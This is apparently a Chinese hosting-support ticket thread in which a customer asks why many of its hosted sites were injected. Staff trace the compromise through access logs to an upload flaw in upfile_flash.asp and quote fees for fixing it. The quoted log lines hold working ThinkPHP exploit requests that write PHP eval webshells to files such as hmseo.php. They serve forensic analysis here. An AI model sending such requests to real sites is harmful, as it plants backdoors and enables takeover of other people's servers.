问:
经常客户不同的网站,被这样的注入
你们的服务器防护还是有点不行啊 ,我们放西数服务器空间里的很多网站被注入,放万网服务器里的就没事,到底怎么回事?
问: 不是一个、二个网站是这样的,好多个网站都是这样的请你们看截图
问:网站里,不同的文件夹被写入了各种各样的文件,一定要告知我们源头怎么来的,到底是怎么回事 这个洞一定要堵住,不是一个网站这样子,是不少网站都是这样子,就这段时间;以前都是好好的
答:您好,您的网站存在程序漏洞被挂马了。
比如 就是加密的后门文件,请您联系此网站的程序开发人员,溯源对应的程序漏洞,并且进行修复。非常感谢您长期对我司的支持!
问:溯源对应的程序漏洞 : 不要这样子说
答:您好,根据文件被修改的时间,我们检查了其对应的访问日志
16:11:33 POST /feedback.asp – – 127.0.0.1 HTTP/1.1 Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Core/1.53.2372.400 QQBrowser/9.5.10548.400 http://www.qunancn.com/feedback.html 200 579 140
16:30:12 GET / s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell<?php%20@eval($_POST[]);?> – 127.0.0.1 HTTP/1.1 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) http://www.qunancn.com//?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell<?php @eval($_POST[]);?> 200 11711 0
16:30:15 GET / a=fetch&templateFile=public/index&prefix=\’\’&content=<php>file_put_contents(\’hmseo.php\’,\'<?php%20@eval($_POST[hm]);?>hmseo\’)</php> – 127.0.0.1 HTTP/1.1 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) http://www.qunancn.com//?a=fetch&templateFile=public/index&prefix=\’\’&content=<php>file_put_contents(\’hmseo.php\’,\'<?php @eval($_POST[hm]);?>hmseo\’)</php> 200 11711 0
这三条http请求 非常可疑,请分析一下。
此类情况 请您溯源对应的程序漏洞 进行修改,并且进行安全设置,可以了解:https://www.west.cn/faq/list.asp?unid=733。
非常感谢您长期对我司的支持!
问:网站空间里,第一个注入的文件是那个文件? 是什么时候?
我们 http://www.qunancn.com/feedback.html 这个 feedback.asp 文件引起的问题?
现在是有好几个网站,都是这样子被注入的, 我们需要给彻底处理下
答:您好,以上的工单 已经查询了相应的后门文件,如果需要深入排查,这种属于您程序漏洞的问题了,还请您自行排查一下 ,非常感谢您长期对我司的支持!
问:网站空间里,第一个注入的文件是那个文件? 是什么时候?
问:我们 http://www.qunancn.com/feedback.html 这个 feedback.asp 文件引起的问题?
网站空间里,第一个注入的文件是那个文件? 是什么时候?
答:您好,网站空间里,第一个注入的文件是那个文件? 是什么时候? 这个是需要根据网站日志进行溯源分析,请下载网站日志到本地,结合网站文件被篡改和创建的时间进行分析,查看具体是通过哪个网站程序漏洞进入网站。相关分析只能您自行进行分析排查。非常感谢您长期对我司的支持!
问:为什么我们很多网站,放阿里云空间里很多年,都没有被注入过? 以前放恒汇也是被注入(恒汇的空间我们已经不用了),放西数也是被注入,放阿里云就没事,同样的代码程序,这个是怎么回事?
问:你们帮我们分析: 网站空间里,第一个注入的文件是那个文件? 是什么时候?
答:您好,阿里云也是有被注入的,https://www.bilibili.com/read/cv 您可以查看一下,这个和网站程序存在那里没有关系,您的网站只是运气好没有被篡改而已。
问:我们随便抽查了 80家左右客户的网站,发现以下网站全部都被注入,而且完全一样的注入代码:
问:上面问题,请你们技术主管回答与处理吧
答:您好,
根据文件时间查找对应日志
10:31:34 POST /image/white/buttons.php – – 127.0.0.1 HTTP/1.1 Mozilla/5.0 (compatible; Baiduspider/2.0; h
都是同一个文件修改的,找到/image/white/buttons.php后门文件
根据文件时间查找对应日志
找到后门 //images/_notes/dwsync.php
根据后门文件访问都的IP搜索,找到后门访问前的一条异常的记录
此文件已经删除,跟踪中断
根据/up_pic/qwecer.asp的访问记录,扫描异常日志,发现
/upfile_flash.asp此文件是程序自带的上传文件,基本确认是此文件有上传漏洞
index.asp 篡改时间 ??2022-?04-?10,??19:14:25
根据文件时间,查看对应访问日志
找到后门文件/up_pic/_notes/debanner.php ,
根据文件时间,查看对应访问日志
此文件已经删除,跟踪中断
09:20:15 POST /upfile_flash.asp – – 127.0.0.1 HTTP/1.1 Mozilla/5.0
从上面两个网站的挂马排查上基本确认,网站存在上传漏洞。处理方法:
2.up_pic 设置目录保护
上面排查的网站我们没有做任何修改,相关日志您也可以下载自己分析一下,挂马建议联系程序员清理下,非常感谢您长期对我司的支持!
问:哦,修补费用是给我们这个文件修改为正确的, 然后 可以给我们在西数空间里的所有网站这个 upfile_flash.asp 文件给批量替换一下吗?
问:还有:你们同事说的 这个问题就不用管了是吗? 这么多网站注入是因为 upfile_flash.asp的漏洞问题 ,而不是上面说的 feedback.asp 文件引起的吧?
问:付费是没有问题的,这个注入搞的我们太头疼了
答:您好,是的,只是修复一个文件的费用。所有网站替换这个不包括在内,如果文件是一样的,你可以自己用这一份正常的文件 去替换 其他的文件。
问:修复这个 upfile_flash.asp的漏洞 800元
然后操作下面的,多少费用?批量替换服务器里所有网站的 upfile_flash.asp 这个文件(所有网站里这个文件都完全一样的)批量删除服务器里所有网站的 Thumbs.db 这个文件 与 _notes 这个文件夹 (所有网站里,这2个都是废的文件及文件夹)
批量替换一个文件,批量删除一个文件 及 文件夹,如何收费?
我们需要处理的
答:您好, 那些没办法 批量替换,我们要处理的话,也是逐个网站手工操作。每个网站处理替换upfile_flash.asp,删除Thumbs.db 这个文件 与 _notes ,收费 5元/个网站。 你也可以自己处理的。
